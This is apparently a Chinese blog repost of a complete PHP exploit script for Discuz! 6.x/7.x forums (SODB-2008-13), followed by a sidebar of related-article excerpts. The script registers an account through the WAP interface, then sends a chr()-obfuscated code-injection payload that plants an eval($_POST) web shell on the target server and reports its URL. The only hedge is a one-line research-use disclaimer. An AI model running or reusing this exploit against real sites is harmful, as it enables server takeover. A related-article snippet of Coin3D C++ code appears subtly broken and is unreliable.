Discuz! 6.x/7.x SODB-2008-13 Exp

最新推荐文章于 2021-03-10 07:30:46 发布
最新推荐文章于 2021-03-10 07:30:46 发布
阅读量1k 收藏
点赞数
分类专栏: 脚本网页语言安全和网站攻防 文章标签: cmd fp path shell action function
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/iiprogram/article/details/3341784
版权
from sebug.net

测试方法:
[www.sebug.net]
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 
#!/usr/bin/php
<?php
/**
 * Discuz! 6.x/7.x SODB-2008-13 Exp 
 * By www.80vul.com
 * 文件中注释的变量值请自行修改
 */
$host = 'www.80vul.com';
// 服务器域名或IP
$path = '/discuz/';
// 程序所在的路径
$key  = 0;
// 上面的变量编辑好后,请将此处的值改为1

if (strpos($host, '://') !== false || strpos($path, '/') === false || $key !== 1)
     exit("专业点好不,先看看里面的注释 -,-/n");

error_reporting(7);
ini_set('max_execution_time', 0);

$key = time();
$cmd = 'action=register&username='.$key.'&password='.$key.'&email='.$key.'@80vul.com&_DCACHE=1';
$resp = send();

preg_match('/logout=yes&amp;formhash=[a-z0-9]{8}&amp;sid=([a-zA-Z0-9]{6})/', $resp, $sid);

if (!$sid)
    exit("哦,大概是没有开启WAP注册吧 -,-/n");

$cmd = 'stylejump[1]=1&styleid=1&inajax=1&transsidstatus=1&sid='.$sid[1].'&creditsformula=${${fputs(fopen(chr(46).chr(46).chr(47).chr(102).chr(111).chr(114).chr(117).chr(109).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(101).chr(118).chr(97).chr(108).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(93).chr(41).chr(63).chr(62).chr(56).chr(48).chr(118).chr(117).chr(108))}}';
send();

$shell = 'http://'.$host.$path.'forumdata/cache/eval.php';

if (file_get_contents($shell) == '80vul')
    exit("好了,去看看你的WebShell吧:/t$shell/n里面的代码是:/t<?eval(/$_POST[c])?>/n别告诉我你不会用 -,-/n");
else
    exit("嗯,大概是该网站不存在漏洞,换一个吧 -,-/n");

function send()
{
    global $host, $path, $url, $cmd;

    $data = "POST ".$path."wap/index.php  HTTP/1.1/r/n";
    $data .= "Accept: */*/r/n";
    $data .= "Accept-Language: zh-cn/r/n";
    $data .= "Referer: http://$host$path/r/n";
    $data .= "Content-Type: application/x-www-form-urlencoded/r/n";
    $data .= "User-Agent: Opera/9.62 (X11; Linux i686; U; zh-cn) Presto/2.1.1/r/n";
    $data .= "Host: $host/r/n";
    $data .= "Connection: Close/r/n";
    $data .= "Content-Length: ".strlen($cmd)."/r/n/r/n";
    $data .= $cmd;

    $fp = fsockopen($host, 80);
    fputs($fp, $data);

    $resp = '';

    while ($fp && !feof($fp))
        $resp .= fread($fp, 1024);

    return $resp;
}

?>
// Sebug.net [ 2008-11-14
iiprogram
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
discuz!6.1GBK 版本论坛系统
02-27
越的访问速度和负载能力 Discuz! 从创立之初即以提高产品效率为突破口,随着编译模板,语法生成内核,数据缓存和自动更新机制等独创或独有技术的应用,和坚固的数据结构及最少化数据库查询设计,使得 Discuz! 可以在极为繁忙的服务器环境下快速稳定运行,切实节约企业成本,提升企业形象。 强大而完善的功能 除了一般论坛所具有的功能外, Discuz! 还提供了很大限度的个性化设定。众多功能在后台预留开关,可按企业需要启用。前台全部采用编译模板技术构建,更换界面易如反掌。完善的权限设定,使管理员可控制到每个用户,每个组及所在每个分论坛的各种权限。 国际化和标准化的产品架构 目前发布的版本分为简体中文,繁体中文和英文三个版本。自 Discuz! 2.0 以来,因其高效国际化内核的应用,使其成功走出国门,步入海外市场,商业客户遍及中国大陆,香港,台湾,北美,欧洲,澳洲,马来西亚等国家和地区。 周密的安全部署和攻击防护 Discuz! 能有效处理页面格式,保证页面及表格的完整性。安全检查应用于每一个 Discuz! 代码中,可自动屏蔽贴子及签名等中的恶意代码和跨站脚本攻击。独有的全程操作记录,使论坛运行情况随时有据可查。 持久的创新和广阔的前景 Discuz! 拥有一支富于创新的开发队伍,持续性的技术优势和不断增长的市场经验,除了强化已有的市场竞争力以外,更增强了已有和潜在客户的信心,我们并不满足于现有成果,我们时刻关注国内外相关领域内的最新进展和动态,不断的进步和创新,已使越来越多的人相信 Discuz! 辉煌的明天。 操作系统要求 Discuz! 具备跨平台特性,可以运行于 Linux/FreeBSD/Unix 及微软 Windows 2000/2003 等各种操作系统环境下。我们已在软件中针对上述操作系统做了大量的测试和实地检验,保证 Discuz! 可以在上述系统中安全稳定的运行,但您仍然需要做好服务器操作系统级的安全防备措施,例如Windows用户需更改 MySQL for Windows 的初始 root 密码,避免跨目录的文件读写。类 Unix 用户需避免使用过于简单的密码,避免跨用户目录的文件读写,做好服务器上其他相关软件(如 Sendmail、ftpd、httpd)等的安全防范,使用较新的软件版本等。 如果您租用虚拟主机,一般正规和技术力量较强的虚拟主机提供商会已经做好操作系统的各项准备,用户可不必关注此部分。 推荐使用 Linux/FreeBSD 操作系统,不仅完全免费,而且可以获得更好的稳定性和负载能力。如果使用Windows 系统,请将 PHP 以 ISAPI(非 CGI)方式安装。 语言及数据库支撑环境要求 Discuz! 需要服务器上装有如下软件: 可用的httpd服务器(如 Apache、Zeus、IIS 等) PHP 4.1.0 及以上 Zend Optimizer 2.5.7 及以上 MySQL 3.23 及以上(仅针对 MySQL 版 Discuz! ) 以上软件除了 httpd 软件有可能需要购买以外,其余均为跨平台的免费软件,推荐使用以上软件的最新稳定版本,不仅拥有更多的功能,而且通常已修复了已知老版本的安全漏洞。 如果您租用虚拟主机,请咨询虚拟主机提供商,您的空间服务器是否已安装了上述软件。由于 Discuz! 的数据表具有前缀设计,因此通常情况下可以将 Discuz! 与其他软件安装在同一个数据库中,或采用不同的前缀名从而在同一个数据库中安装多个 Discuz! 论坛而不产生冲突。 您的 MySQL 数据库账号应当拥有 CREATE、DROP、ALTER等执行权限,同时文件空间需不低于 2M,数据库空间不低于 5M,通常您的虚拟空间都会满足这个条件,以满足包括 Discuz! 在内的绝大多数网络软件的正常运行。如果您不了解具体情况,请咨询您的空间提供商。 Discuz! 7.0.0 更新日志 【全新】社区 UI 设计,开创性操作引导和页面布局,大幅度提升会员使用体验 【全新】风格模板体系,打造个性化论坛风格更容易,论坛展现效果更突出 【全新】论坛风格可视化编辑器,支持在线设计风格,可实时预览设计效果 【全新】论坛风格管理系统,风格安装、卸载一键完成,支持风格效果图 【内置】16 款精心设计的炫酷风格和 7 套模板,供各种类型的站点选用,个性十足 【全新】论坛任务系统,进一步增强社区会员的互动行为,可利用任务增强社区的粘性、增加活跃度 【内置】会员类、帖子类、红包类、推广类、头像类 5 种论坛任务,轻松设计各种论坛任务 【支持】任务衍生,每类任务可根据申请条件、完成条件、奖励内容衍生出无数种任务 【支持】自定义任务脚本,内置自定义任务的安装、升
discuz各版本下载支持php6,Discuz! 6.0如何升级到6.1版本教程
weixin_30470785的博客
03-12 325
教程|discuz分三部分为大家讲解:(一)升级前的准备1、下载正式版 Discuz!6.1.0 到本地或服务器上,如下图所示:1.jpg (14.81 KB)2008-4-21 10:282、升级到 Discuz!6.1.0 后原来的风格将不能继续使用,故此在升级之前先把风格换回默认风格,如下图所示:2.jpg (28.58 KB)2008-4-18 15:31修改的方法:管理员登录论坛后台 =...
Discuz! 6.x/7.x EXP
weixin_34233421的博客
08-05 144
以下是Discuz! 6.x/7.x EXP#!/usr/bin/php&lt;?php/** * Discuz! 6.x/7.x SODB-2008-13 Exp  * By www.80vul.com * 文件中注释的变量值请自行修改 */$host = 'www.80vul.com';// 服务器域名或IP$path = '/discuz/';// 程序所在的路径$key  = 0;// 上...
php request漏洞利用,牛人写的. 高级PHP应用程序漏洞审核技术
weixin_34028581的博客
03-10 249
251062610627106281062910630106311063210633o70693pjwCrvVt3oobAaOr-------------------------------------------------------------------------------当10634次时候我们得到了结果。当PHP版本到了5.2.1后,通过修改算法修补了奇数和偶数的播种相等的问题,这样...
dz php6,高级PHP应用程序漏洞审核技术/php程序检查漏洞
weixin_35541322的博客
03-10 120
php468%2000-2007,No security fixes after 2008/08,最终版本是php4.4.9php532%2004-present,Now at version 5.2.6(PHP 5.3 alpha1 released!)php6目前还在测试阶段,变化很多做了大量的修改,取消了很多安全选项如magic_quotes_gpc(这个不是今天讨论的范围)漏洞审计策略PH...
高级PHP应用程序漏洞审核技术
xysoul的专栏
01-29 3444
https://code.google.com/archive/p/pasc2at/wikis/SimplifiedChinese.wiki 前言 PHP是一种被广泛使用的脚本语言,尤其适合于web开发。具有跨平台,容易学习,功能强大等特点,据统计全世界有超过34%的网站有php的应用,包括Yahoo、sina、163、sohu等大型门户网站。而且很多具名的web应用系统(包括bb
【转】高级PHP应用程序漏洞审核技术
heiyeluren的blog(黑夜路人的开源世界)
08-05 4425
 作者:Ph4nt0m Security Team来源:http://www.ph4nt0m.org-a.googlepages.com/PSTZine_0x03_0x06.txt   ==Ph4nt0m Security Team== Issue 0x03, Phile
(转)PHP代码漏洞审核
Chelin Tsien的专栏
08-05 3603
作者:Ph4nt0m Security Team来源:http://www.ph4nt0m.org-a.googlepages.com/PSTZine_0x03_0x06.txt                           ==Ph4nt0m Security Team==                        Issue 0x03, Phile #0x06 of 0x07
PHP脚本审计(二)
weixin_33997389的博客
04-27 144
2) mt_srand()/srand()-weak seeding(by Stefan Esser)看php手册里的描述:mt_srand(PHP 3>=3.0.6, PHP 4, PHP 5)mt_srand --播下一个更好的随机数发生器种子说明void mt_srand (int seed )用 seed 来给随机数发生器播种。从 PHP 4.2.0 版开始,s...
协议软件部培训PPT-H264视频编解码技术.ppt
11-12
- **RBSP和SODB**:残留差分块的位流(RBSP)和语法元素数据块(SODB)。 4. **视频编解码概念**: - 基于波形的编码:H.263、H.264等利用预测和变换减少信号相关性,实现压缩。 - 基于内容的编码:MPEG-4等,...
h264-Nalu-详解.docx
11-07
H.264 NAL 详解 ...处理过程中,VCL 层输出的 SODB 封装成 nal_unit,Nal_unit 是一个通用封装格式,可以适用于有序字节流方式和 IP 包交换方式。然后,将 nal_unit 封装成针对不同网络的封装格式。
Coin-3.0.0-bin-msvc6.zip
06-10
首先,"Coin-3.0.0-bin-msvc6.zip"是一个包含Coin3D 3.0版本的库文件和相关资源的压缩包,特别针对VC6.0编译环境进行了优化。在解压后,我们可以看到四个主要的文件夹:data、bin、include和lib。 1. **data** ...
SODB 南大洋数据库工具箱:访问、内插和绘制 SODB 数据。-matlab开发
06-01
**SODB南大洋数据库工具箱** 是一个专为科研人员设计的MATLAB工具,由David Gwyther和Chad Greene共同开发,主要用于处理、访问、内插和绘制来自南极海洋科学观测数据库(South Ocean Data Base,简称SODB)的数据。...
iso-iec 14496-10(3rd_2006-03-01)_MPEG4_AVC_H264.pdf
10-24
Contents Page 0 Introduction................................6 Source, coded, decoded and output data formats, scanning processes, and neighbouring relationships.......... 14 6.1 Bitstream formats...........
转:高级PHP应用程序漏洞审核技术
weixin_30469895的博客
02-27 180
前言 PHP是一种被广泛使用的脚本语言,尤其适合于web开发。具有跨平台,容易学习,功能强大等特点,据统计全世界有超过34%的网站有php的应用,包括Yahoo、sina、163、sohu等大型门户网站。而且很多具名的web应用系统(包括bbs,blog,wiki,cms等等)都是使用php开发的,Discuz、phpwind、phpbb、vbb、wordpress、boblog等...
Perl Underground 5
热门推荐
08-26 1万+
  $$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$ $$$$ %%%%%%%% X x $$$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$$ $$$$ %%%%%%%% x H H $$
WINDOWS下使用EXPECT的简单例子
09-14 8052
这是一个自动登录AIX服务器的例子。 1、先去如下地方下载expect:windows">http://expect.nist.gov/#windowsftp://bmrc.berkeley.edu/pub/winnt/tcltk/expect2、安装默认路径是C:Program FilesExpect-5.21binexpect.exe就在这里3、写个简单的脚本sample.tx
crt应用脚本一例子,windows下的expect
09-14 2859
日常工作有大量cisco路由器,交换机设备备份,telnet设备需要通过其一台服务器(solaris系统)进入,因网络关系无法通过TFTP完成备份.因此程序通过crt软件脚本实现.作:gyhong# $language = "VBScript"# $interface = "1.0"Cnstr="Provider=Microsoft.Jet.OLEDB.4.0;Data Source=db.mdb
coin3d 双面渲染什么时候调用,如何启用,请给出c++示例代码
最新发布
05-31
在Coin3D中,双面渲染在渲染场景的时候进行调用。如果你想要启用双面渲染,需要设置材质的backfaceculling属性为false。下面是一个简单的c++示例代码,演示如何在Coin3D中启用双面渲染: ```c++ #include <Inventor/SoDB.h> #include <Inventor/SoInput.h> #include <Inventor/SoSceneManager.h> #include <Inventor/nodes/SoCone.h> #include <Inventor/nodes/SoMaterial.h> #include <Inventor/nodes/SoSeparator.h> int main(int argc, char **argv) { // 初始化Coin3D SoDB::init(); // 创建场景管理器 SoSceneManager *sceneManager = new SoSceneManager(); // 创建材质节点 SoMaterial *material = new SoMaterial(); material->backfaceCulling = false; // 启用双面渲染 // 创建圆锥体节点 SoCone *cone = new SoCone(); cone->bottomRadius = 1.0; cone->height = 2.0; // 创建分离器节点 SoSeparator *root = new SoSeparator(); root->addChild(material); root->addChild(cone); // 将根节点添加到场景管理器中 sceneManager->setSceneGraph(root); // 显示场景 sceneManager->show(); // 进入Coin3D事件循环 SoDB::show(); SoDB::eventLoop(); // 清理内存 delete sceneManager; return 0; } ``` 在上面的代码中,我们创建了一个圆锥体节点和一个材质节点,并将材质节点的backfaceculling属性设置为false,从而启用了双面渲染。然后,我们将这些节点添加到分离器节点中,并将分离器节点作为场景的根节点。最后,我们创建了一个场景管理器,并将根节点添加到场景管理器中,然后显示场景并进入Coin3D的事件循环。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值